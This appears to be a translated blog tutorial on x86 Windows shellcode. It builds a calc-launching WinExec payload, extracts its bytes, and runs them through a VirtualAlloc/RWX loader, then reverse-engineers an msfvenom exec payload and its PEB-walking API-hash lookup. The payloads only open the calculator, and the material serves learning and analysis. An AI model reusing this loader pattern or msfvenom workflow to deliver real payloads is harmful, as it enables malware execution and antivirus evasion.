0x02 Write a simple shellcode

When I first started in this industry, I saw all sorts of shellcode flying around. Staring at those bytes, and at the poster of Neo from The Matrix on my wall, I gradually grew fascinated by it. Shellcode is flexible and is commonly used for antivirus evasion and vulnerability exploitation. So how do we extract and load a piece of shellcode, and how does Metasploit (msf) implement its shellcode?

0x01 Shellcode Basics

Shellcode is machine code, usually written out as a string of hexadecimal bytes. To see what that means, we start with a simple program that opens the calculator, calc.exe.

#include "stdafx.h"
#include <windows.h>

int main(int argc, char* argv[])
{
  WinExec("calc", 1);   // launch the calculator; 1 is SW_SHOWNORMAL
  return 0;
}

A very simple program: it calls the Windows API WinExec to open the calculator. Next, we look at the call in OllyDbg (OD) under dynamic debugging.

push 0x1                                ; x86 passes arguments on the stack; this is the 1 in WinExec("calc",1)
push OpenCalc.00406030                  ; address of the "calc" string, the first argument
call dword ptr ds:[<&KERNEL32.WinExec>] ; call WinExec in KERNEL32 through the import table

The problem

Written as a C string, the machine code of these three instructions is "\x6A\x01\x68\x30\x60\x40\x00\xFF\x15\x00\x50\x40\x00", the kind of shellcode string you often see. If we load this string into memory, will it run? I'm afraid not: nothing guarantees that address 0x406030 holds the calc string in every program, or that the import table entry at 0x405000 holds the address of WinExec.

0x02 Write a simple shellcode

At this point the ever-curious Xiao Ming asks: if we build the calc string ourselves and hardcode the WinExec address, will the code at least run on the current host? Let's try.

First, construct the calc string

xor  ecx, ecx              ; zero ecx
push ecx                   ; push 0 to act as the string terminator \x00
push 0x636c6163            ; "calc" in little-endian byte order (the immediate reads "clac")
mov  eax, esp              ; eax = top of stack, which now points to calc\x00

**Get Kernel32 WinExec Address**

There are two ways to obtain the address: read it in the debugger, or call GetProcAddress.

Method one:
In OD, select the instruction (or right-click it) and follow it in the data window to read the WinExec address.
Method two:

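#include "stdafx.h"
#include <stdio.h>
#include <windows.h>

// WinExec is declared as UINT WINAPI WinExec(LPCSTR lpCmdLine, UINT uCmdShow)
typedef UINT (WINAPI *MYPROC)(LPCSTR, UINT);

int main() {
  HMODULE Kernel32Addr;
  MYPROC WinExecAddr;

  // Get the base address of the already-loaded kernel32.dll
  Kernel32Addr = GetModuleHandleA("kernel32.dll");
  printf("KERNEL32 address in memory: 0x%p\n", (void*)Kernel32Addr);

  // Look up WinExec in kernel32's export table
  WinExecAddr = (MYPROC)GetProcAddress(Kernel32Addr, "WinExec");
  printf("WinExec address in memory is: 0x%p\n", (void*)WinExecAddr);

  getchar();  // keep the console window open
  return 0;
}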

Construct the complete assembly code

section .data

section .bss

section .text
  global _start

_start:
  xor  ecx, ecx         ; zero ecx
  push ecx              ; push 0 as the string terminator \x00
  push 0x636c6163       ; "calc" in little-endian byte order
  mov  eax, esp         ; eax points to calc\x00 on the stack

  inc  ecx              ; ecx = 1
  push ecx              ; second argument: 1
  push eax              ; first argument: pointer to calc\x00
  mov  ebx, 0x7c86250d  ; WinExec address obtained above (specific to this machine)
  call ebx              ; call WinExec

Save the code above as xxx.asm. If no assembler is set up on Windows, you can build it on Kali instead. Only the instruction bytes are needed, so assembling to an ELF object is fine:

nasm -f elf32 -o xxx.o xxx.asm
ld -m elf_i386 -o xxx xxx.o

Then disassemble the file with objdump -d xxx and print the bytes as a C string:

objdump -M intel -d xxx | grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

This gives us our shellcode.
Load the shellcode

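#include "stdafx.h"
#include <string.h>
#include <windows.h>

// Note: the trailing \x59 decodes to pop ecx, which is not in the assembly listing above
unsigned char shellcode[] =
"\x31\xc9\x51\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\xbb\x0d\x25\x86\x7c\xff\xd3\x59";

int main(int argc, char* argv[])
{
  // Allocate readable, writable and executable memory for the shellcode
  void* exec = VirtualAlloc(NULL, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if (exec == NULL)
    return 1;

  // Copy the shellcode in and call it as a function
  memcpy(exec, shellcode, sizeof shellcode);
  ((void(*)())exec)();
  return 0;
}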

Compile and run.
The calculator pops up, which proves Xiao Ming's conjecture. Still full of questions, Xiao Ming then asks: "What use is a hardcoded address that only works on this one machine?" Let's look at how msf's shellcode manages to work across different machines.

0x03 Analyze msf's shellcode

We analyze the msf shellcode from a reverse engineering perspective. First, generate shellcode with the same functionality as above using msfvenom:

msfvenom -p windows/exec cmd=calc.exe -f c

Then compile a loader around it and reverse engineer the result.

#include "stdafx.h"
#include <windows.h>

// msf shellcode 
unsigned char shellcode[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

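int main(int argc, char* argv[])
{
  // Same loader as before: allocate executable memory, copy the shellcode, call it
  void* exec = VirtualAlloc(NULL, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if (exec == NULL)
    return 1;
  memcpy(exec, shellcode, sizeof shellcode);
  ((void(*)())exec)();
  return 0;
}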

OllyDbg reported errors when I tried to debug this program, so I switched to WinDbg for dynamic debugging.

0x401000 is the main function (the start of the code section). This is our loader: it allocates memory with VirtualAlloc, which returns the address in eax (0x003A0000 here), uses memcpy to copy the shellcode variable from the .data section to 0x003A0000, and then calls that address.

Stepping into the call shows that the shellcode has been copied into memory and runs normally. I annotated what each instruction does in the screenshot.

[Screenshot: annotated disassembly of the shellcode in WinDbg]

The overall flow breaks down as follows:

1. The initial call (relative offset 0x82) jumps over the API lookup routine and leaves that routine's address on the stack, where pop ebp picks it up. The code then pushes the parameter 1, the address of the 'calc.exe' string stored at the end of the shellcode (lea eax, [ebp+0xB2]), and the WinExec API hash 0x876F8B31, and calls the lookup routine

2. Walk the module list in the PEB to get the next module's base address and compute a hash of its name

3. Parse the module's PE header; if it has no export table, skip the module and continue with step 2

4. Parse the export table; if the number of exported names is 0, skip the module and continue with step 2

5. Traverse the export name table, hashing each export name and comparing the result (module hash plus name hash) with the requested hash to find the function, here WinExec

6. If the function is not found, follow the linked list to the next module and continue with step 2

7. Once WinExec is found, jump to it to execute the function

What is particularly interesting here is the use of API hashes to look up function addresses, a technique known as SFHA (Stephen Fewer's Hash API), which was the subject of a talk at DEF CON in 2017.

0x04 Summary

As the saying goes, diligence is the path up the mountain of books, and hard work is the boat across the endless sea of learning. Deepening this understanding still takes a lot of hands-on code debugging.
